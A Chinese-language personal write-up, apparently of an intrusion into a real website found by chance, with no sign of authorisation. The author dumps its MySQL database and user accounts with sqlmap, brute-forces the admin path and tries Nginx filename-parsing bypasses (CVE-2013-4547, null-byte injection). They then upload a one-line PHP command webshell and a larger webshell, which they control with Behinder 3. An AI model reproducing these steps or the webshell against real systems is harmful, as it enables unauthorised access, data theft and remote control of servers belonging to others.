首次渗透实战测试笔记

偶然得知该网站存在sql注入，手工有点差，直接使用了sqlmap进行暴库。网站没有防火墙，所以相对比较轻松。

信息收集

1.SQL注入验证存在

数据库为 mysql
the back-end DBMS is MySQL
web application technology: PHP 5.3.29, Nginx 1.14.1
back-end DBMS: MySQL >= 5.6 (Percona fork）

2.爆数据table

3.爆用户账户

4.MySQL权限只有个usage，权限较低

5.尝试登录网站

• 首先需要获得网站的管理界面

  使用御剑后台扫描珍藏版爆破，可能是操作姿势不对，无果

  使用御剑爆破，用自带的字典爆出了robots.txt

  

• /adm/登录后台

• 寻找上传编辑器
  

  找到了一处上传商品图片地方，想到可以使用图片解析漏洞

nginx 1.14.1解析漏洞

漏洞原理

1，Nginx越界读取缓存漏洞（CVE-2017-7529） 可以读取到缓存文件中位于“HTTP返回包体”前的“文件头”、“HTTP返回包头”等内容。
2，Nginx 文件名逻辑漏洞（CVE-2013-4547） 主要原因是错误地解析了请求的URI，错误地获取到用户请求的文件名，导致出现权限绕过、代码执行的连带影响。
3，Nginx解析漏洞复现 第3和第2都是文件解析漏洞，只是利用的方式不同，第2利用方式为：1.png.php。而第3利用方式为：1.png/.php。这样，1.png文件就会当成php文件进行解析。从而造成代码执行等。

测试nginx漏洞

1. 准备php,命名为2fuckm.php

   <?php system($_GET['cmd']);?>
   

2. 然后上传该文件，进行抓包

   

3. 在文件名后面加上一个空格，进行放包

   

4. 在前端通过图片右键可以复制图片的网址，然后访问图片，发现网址存储图片的位置，先访问刚才上传的网址，不存在

   界面报404错误，上传的文件找不到，是因为浏览器自动将空格编码为%20，服务器中找不到文件。

   

5. 发送请求并使用burpsuite抓包。进到16进制中，在.jpg和.php中间加入 [20][00]

   

6. 放到重放器

   

7. 复现失败，错误原因不清楚

上传小马

图片解析失败，尝试上传小木马远控

上传没有对上传文件进行限制，所以可以直接上传

可以直接访问，但是菜刀连接失败，原因不清，有表哥说是因为get，post问题

直接上传大马，可以直接访问webshell，使用冰蝎3连接成功

提权目前还需要深入研究